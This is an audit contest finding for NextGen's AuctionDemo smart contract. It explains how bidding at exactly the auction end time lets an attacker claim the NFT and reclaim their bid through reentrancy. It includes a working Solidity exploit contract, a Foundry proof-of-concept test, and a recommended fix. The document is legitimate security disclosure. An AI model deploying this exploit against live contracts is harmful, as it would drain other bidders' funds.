NextGen - 0xMango's results

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104

Vulnerability details

Impact

Regardless of the amount of ether the previous bidder deposited. A well-timed transaction or one done by a malicious validator at minterContract.getAuctionEndTime(tokenId) will be granted permission to invoke both claimAuction(tokenId) as well as cancelAllBids() via callback. Subsequently, the attacker will end up with the listed nft as well as his ether back.

Proof of Concept

Starting of with the contract which will perform the last bid at minterContract.getAuctionEndTime(tokenId). This contract will make use of the IERC721Receiver interface, to trigger auctionDemo.cancelAllBids(tokenId) exploiting the auctionDemo contract as the caller, when triggering the safetransfer() to the highest bidder.

// SPDX-License-Identifier: Built By Mango
pragma solidity ^0.8.19;

import {IERC721Receiver} from "../../src/IERC721Receiver.sol";
import {auctionDemo} from "../../src/AuctionDemo.sol";

contract Reentrant is IERC721Receiver {

    auctionDemo _auctionDemo;

    constructor(
        address auctionContract
    ) {
        _auctionDemo = auctionDemo(auctionContract);
    }

        function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
        ) external returns(bytes4) {

        // Reentrancy:
        _auctionDemo.cancelAllBids(30000000000);

        return this.onERC721Received.selector;
    }

    fallback() external payable {
    }
}

Finally, the full POC shows 2 users placing bids, while the last one outbids them by 1 wei & calling claimAuction(tokenId) in the same transaction, to guarantee the nft & the ether payback.

function testVulnerableAuction() public {
        // Sets up bid for token id: 30000000000
        _mintAndAuction();

        vm.prank(fixAddress("RegularUser1"));
        vm.deal(fixAddress("RegularUser1"), 2e18);
        _auctionDemo.participateToAuction{value: 2e18 -1}(30000000000);

        vm.prank(fixAddress("RegularUser2"));
        vm.deal(fixAddress("RegularUser2"), 2e18);
        _auctionDemo.participateToAuction{value: 2e18}(30000000000);

        uint256 auctionEndTime = minterContract.getAuctionEndTime(30000000000);

        vm.prank(address(reentrant));
        vm.deal(address(reentrant), 2e18 +1);
        vm.warp(auctionEndTime);
        _auctionDemo.participateToAuction{value: 2e18 + 1}(30000000000);
        _auctionDemo.claimAuction(30000000000);

        assertEq(address(reentrant).balance, 2e18+1); // 2e18 + 1 wei is returned!
    }

Needless to say, previous bidders, would be left without any funds to recover, due to the highest amount going to the admin, who listed the nft.

Tools Used

Foundry

Recommended Mitigation Steps

The specific lines that allow for this vulnerability are both require statements in both claimAuction and cancelAllBids.

require(block.timestamp >= minter.getAuctionEndTime(_tokenid) && auctionClaim[_tokenid] == false && minter.getAuctionStatus(_tokenid) == true);
require(block.timestamp <= minter.getAuctionEndTime(_tokenid), "Auction ended");

These lines allow for invoking both functions at exactly minter.getAuctionEndTime(_tokenid).

Assessed type

Reentrancy